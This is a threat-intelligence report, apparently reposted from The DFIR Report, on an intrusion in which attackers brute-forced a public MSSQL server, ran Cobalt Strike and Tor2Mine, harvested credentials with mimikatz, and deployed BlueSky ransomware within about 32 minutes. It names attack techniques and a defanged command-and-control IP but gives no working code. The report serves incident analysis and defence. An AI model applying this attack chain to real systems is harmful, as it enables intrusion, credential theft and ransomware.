In December 2022, we observed an intrusion on a public-facing MSSQL Server, which resulted in BlueSky ransomware.
First discovered in June 2022, BlueSky ransomware has code links to Conti and Babuk ransomware.
While other reports point to malware downloads as initial access, in this report the threat actors gained access via a MSSQL brute force attack.
Within one hour of the threat actors accessing the network, they deployed BlueSky ransomware network wide.
In the month of December 2022, we observed a cluster of activity targeting MSSQL servers.
The command contained base64 encoded content, which, upon execution, established a connection to a Cobalt Strike command and control server.
The PowerShell session was then seen making a connection to a Tor2Mine stager server.
Around 15 minutes after initial access, the threat actors then moved laterally toward domain controllers and file shares using remote service creation.
These services were used to execute the same PowerShell commands, download and execute the Tor2Mine malware.
Upon establishing access to one of the domain controllers the threat actors performed similar activity as observed on the beachhead. After roughly 30 minutes of initial access, the BlueSky ransomware binary was dropped and executed on the beachhead. The execution worked as intended which resulted in the ransomware spreading to all devices in the network over SMB. The time to ransomware in this case was 32 minutes.
The Cobalt Strike server observed in this intrusion was first observed on December 16th 2022 and remained active through January 17th 2023.
The PowerShell scripts involved in this case as well as infrastructure for the Tor2Mine server were observed being reused in May 2023 with the PaperCut NG CVE-2023-27350 exploit as the initial access source.
We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Sliver, BianLian, Metasploit, Empire, Havoc, etc.
In the next attack stage, the threat actors established a command shell via Extended SQL Stored Procedure.
The threat actor then executed a Cobalt Strike beacon and a PowerShell script that has previously been identified by Sophos as used in campaigns to deploy Tor2Mine malware.
Ps1, a PowerShell version of mimikatz from the Tor2Mine server.
The threat actor was seen injecting code into legitimate process winlogon.
During the intrusion the threat actor deployed XMrig miner which loaded the driver WinRing0.
Ps1 the threat actor created 16 different tasks on the hosts where Tor2Mine was deployed.
Decoding the command we can see the same PowerShell download and execute as observed on the beachhead. The hexadecimal value 0x53611451 corresponds to the IP address 83.97.20[.]81 which was the command and control server for the Tor2Mine malware.
This Cyber News was published on thedfirreport.com. Publication date: Mon, 04 Dec 2023 02:13:10 +0000